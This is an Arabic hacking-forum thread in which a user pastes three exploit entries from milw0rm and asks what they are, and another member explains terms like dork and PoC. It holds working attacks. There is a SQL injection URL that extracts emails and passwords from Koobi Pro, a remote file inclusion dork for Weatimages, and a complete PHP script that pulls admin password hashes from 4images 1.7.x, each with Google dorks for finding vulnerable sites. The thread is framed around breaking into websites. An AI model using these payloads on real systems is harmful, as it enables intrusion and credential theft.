التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 05-11-2010, 08:57 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو





ALG_vbspiders غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ALG_vbspiders is on a distinguished road

Question غير مجاب: مساعدة من فظلكم في فهم شيء واحد بليييييييييييييز


السلام عليكم

اخواني انا دخلت موقع الميل ورم ادور على الثغرات في هدا السكريبت images

لكن طلعت هده

سؤالي هل هي ثغرة في الاوبرا او ماذا :a23:

[PHP]#########################################
#
# Koobi Pro V6.25 showimages (galid)
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?area"galid
#
###########################################
EXPLOiT :

index.php?area=1&p=gallery&action=showimages&galid =-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user

###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

# milw0rm.com [2008-04-08]/PHP]

المصدر

http://www.milw0rm.com/exploits/5414
ومادا تسمى هده ثغرة اومادا smilies2

[PHP]RFI Weatimages Hack
Script name : Weatimages
Script Download Adress:http://www.hotscripts.com/jump.php?listing_id=52592&jump_type=1
Demo site:http://www.nazarkin.name/projects/weatimages/demo/index.php?ini[langpack]=shelladress
Google Dork : inurl: index.php?ini[langpack]=

Author:Co-Sarper-Der
Contact:Sarperonline@gmail.com
Note:Thanx to ForeveRIslam

side note:

4. Installation

Unpack file "index.php" from this archive and upload it to separate directory (e.g. "photos/") on your web server.
In order to enable caching capabilities, you need to create the new directory named "weatimages-cache" in directory
with "index.php" and to set access rights 777 (rwxrwxrwx) to "weatimages-cache".
If you plan to customize configuration, upload "weatimages.ini" too.

If weatimages.ini was uploaded too then the product isn't vulnerable.

# milw0rm.com [2007-04-10]/PHP]


المصدر
http://www.milw0rm.com/exploits/3700


وهده اعتقد انها هي الثغرة صحيح:00001734[1]: sql

[PHP]#!/usr/bin/php
<?php
/*
4images 1.7.x Remote SQL Injection Vulnerability

Usage: php file.php [host] [path] [table prefix] [user id]

Googledork "powered by 4images 1.7.x"

Vulnerability: Disfigure
Research: h3llfyr3
Coding: Synsta.

PoC:
<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20u ser_password%20from%204images_users%20where%20user _name=%2527ADMIN

[w4ck1ng] - w4ck1ng.com
*/
if(!$argv[3]){
die("Usage:
php $argv[0] [host] [path] [options] [table prefix] [user id]\n
Options:
-d: Determine table prefix\n
Example:
php $argv[0] domain.com /4images/ 4images_ 1
php $argv[0] domain.com /4images/ -d\n");
}
if(eregi("http://", $argv[1])){
die("Usage:
php $argv[0] [host] [path] [options] [table prefix] [user id]\n
Options:
-d: Determine table prefix\n
Example:
php $argv[0] domain.com /4images/ 4images_ 1
php $argv[0] domain.com /4images/ -d\n");
}
if($argv[3]=="-d"){
$pipe = fsockopen($argv[1],80);
if(!$pipe){
die("Cannot connect to host.");
} else {
$sql = "x%27";
$sql = urlencode($sql);
$req = "GET $argv[2]"."search.php?search_user="."$sql HTTP/1.1\r\n";
$req .= "Host: $argv[1]\r\n";
$req .= "Connection: Close\r\n\r\n";
fwrite($pipe , $req);
while(!feof($pipe)) {
$data .= fgets($pipe);
}
$gdata= explode("FROM ",$data);
$gtab = explode("WHERE ",$gdata[1]);
$tab = trim($gtab[0]);
$tab = str_replace("users","",$tab);
if(eregi("<br />", $page)){ die("Failed.."); }else{ die("Table Prefix: $tab\n"); }
}
}
if($argv[4]){
$pipe = fsockopen($argv[1],80);
if(!$pipe){
die("Cannot connect to host.");
} else {
$sql = "x%27%20union%20select%20user_password%20from%20". "$argv[3]"."users%20where%20user_id%3D%27$argv[4]";
$sql = urlencode($sql);
$req = "GET $argv[2]"."search.php?search_user="."$sql HTTP/1.1\r\n";
$req .= "Host: $argv[1]\r\n";
$req .= "Connection: Close\r\n\r\n";
fwrite($pipe , $req);
while(!feof($pipe)) {
$data .= fgets($pipe);
}
$gdata = explode("Unknown column '",$data);
$ghash = explode("' in 'where clause'",$gdata[1]);
$hash = $ghash[0];
if(strlen($hash) != 32){ die("Exploit failed..\n"); }else{ echo "Outputted Hash: $hash\n"; }
}
}
?>

# milw0rm.com [2006-10-08]/PHP]


المصدر

http://www.milw0rm.com/exploits/2487



اتمنى منكم افدتي ببعض المعلوما ارجوووووووووووووووووكم :a09::a09::a09::a09::a09:




Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC lshu]m lk t/g;l td til adx ,hp] fgddddddddddddd.

التوقيع

Lui vuole uccidermi

Mi scusi per pochi Qlami .. La scuola Tadmrni
Sniper Algeria
suicidio psicologicamente complessa, frammentata mentale scientificamente, la famiglia ha voluto partecipare per la sicurezza ... e poi
?
E-mail per lo scambio di sofferenza
فلسطين
http://services.nexodyne.com/email/i...Fj/0/image.png


متابع لدورة الفريق :grr:
kala$nikoV

 

   

رد مع اقتباس
قديم 05-12-2010, 04:31 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو





ALG_vbspiders غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ALG_vbspiders is on a distinguished road

افتراضي


لا احد يريد مساعدتيprayercry[1]:prayercry[1]:

التوقيع

Lui vuole uccidermi

Mi scusi per pochi Qlami .. La scuola Tadmrni
Sniper Algeria
suicidio psicologicamente complessa, frammentata mentale scientificamente, la famiglia ha voluto partecipare per la sicurezza ... e poi
?
E-mail per lo scambio di sofferenza
فلسطين
http://services.nexodyne.com/email/i...Fj/0/image.png


متابع لدورة الفريق :grr:
kala$nikoV

 

   

رد مع اقتباس
قديم 06-18-2010, 05:54 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Pick
 

 

 
إحصائية العضو






Pick غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Pick is on a distinguished road

افتراضي


السلام عليكم ورحمة الله
سؤاتك غير واضح يا اخي ... ؟؟؟ بدل السؤال اطلب ان تتعلم و ليس هذا القسم المخصص للتعلم :D
انت تبحث عن استفسارات عن اختراق المواقع لهذا انصحك بقسم دوره اختراق المواقع SQL 1nj3ct!on و دورة اكتشاف الثغرات و دوره احتراف استغلال ثغرات المواقع لكن ....
غموما هذه المواقع تعطيك الثغرات المكتشفة حديثا .. كمثال :
# Koobi Pro V6.25 showimages (galid) =السوفت المصاب بالثغرة المكتشفة و الدي يسثعمله الموقع ... في هده الحالة الموقع مصاب :D و ليسث OPRA هذا اكيد
على كل حال ما تحتاجه بسيط و هو تعلم بعض المصطلحات .. منها :
##AUTHOR الكاتب .. بالانجليزية
HOME منزل .. لكن هنا معناها الصفحة الرئيسية ( للكاتب) و هي على نفس الموقع = ليسث رئيسية
BLOG غني على التعريف و ال MAiL ايضا
DORK كلمات البحث للحصول على المواقع المصابة بالثغرة
EXPLOiT المقصود به هنا طريقة استغلال الثغرة
http://www.milw0rm.com/exploits/3700 <<< عموما لو كانت كما قلت(sql) لأسموها كذلك او ذكرو ذلك في ال Description
نعم :D ال POC هو المركز او المكان المحدد من الموقع الذي ستتم فيه العملية اي تطبق فيه الثغرة
اسف لانني لا استطيع التوضيح اكثر (التفسير الممل) لان سؤالك لم يكن واضح و لا دقيق لذا انصحك بزيارة الاقسام المذكورة في البداية

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
من فظلكم برنامج لتجميد حساب الفاسبوك V!rus bt جـــ'ابات العناكــ'ب 3 11-26-2010 02:19 AM
أغيتوني من فظلكم V!rus bt جـــ'ابات العناكــ'ب 8 08-30-2010 12:48 AM
من فظلكم اجيبوني joey جـــ'ابات العناكــ'ب 3 08-05-2010 07:10 PM
رفع ملفات برابط مباشر+برامج اختراق خام+ادوات تشفير مساعدة+برنامج تعديل السورس+الكثير في موقع واحد Garwasha قســم إختــراق الأجهــزة 16 01-08-2010 07:24 AM
بليييييييييييييز لا تردوني الولهان قـسـم الـبـريد الإلـكتروني والحسابات العامة 6 09-03-2009 08:02 AM


الساعة الآن 09:57 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0